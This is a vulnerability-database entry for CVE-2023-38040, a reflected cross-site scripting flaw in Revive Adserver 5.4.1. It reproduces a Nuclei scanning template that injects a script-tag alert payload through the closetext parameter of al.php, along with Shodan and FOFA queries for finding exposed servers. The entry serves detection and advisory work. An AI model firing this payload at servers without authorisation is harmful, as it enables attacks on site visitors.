CVE-2023-38040: Revive Adserver 5.4.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Revive Adserver | POC: 已公开

漏洞描述

A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.

PoC代码[已公开]

id: CVE-2023-38040

info:
  name: Revive Adserver 5.4.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.
  impact: |
    Allows attackers to execute malicious scripts in the context of a victim's browser
  remediation: |
    Upgrade Revive Adserver to version 5.4.2 or later to mitigate the vulnerability
  reference:
    - https://hackerone.com/reports/1694171
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38040
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-38040
    cwe-id: CWE-79
    epss-score: 0.05715
    epss-percentile: 0.90072
    cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    shodan-query: http.favicon.hash:106844876
    fofa-query: icon_hash="106844876"
    vendor: revive-adserver
    product: revive_adserver
  tags: cve,cve2023,revive-adserver,xss

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - 'Revive Adserver'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain);</script>'

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220196aad0884a3b0568d919a030f0c144d6c973235a7a87c6466e52f9a6d97206b022067e1342c866f5066568036b031e35e4f36fe2a20361cff54dedf1e43ce1deaf1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐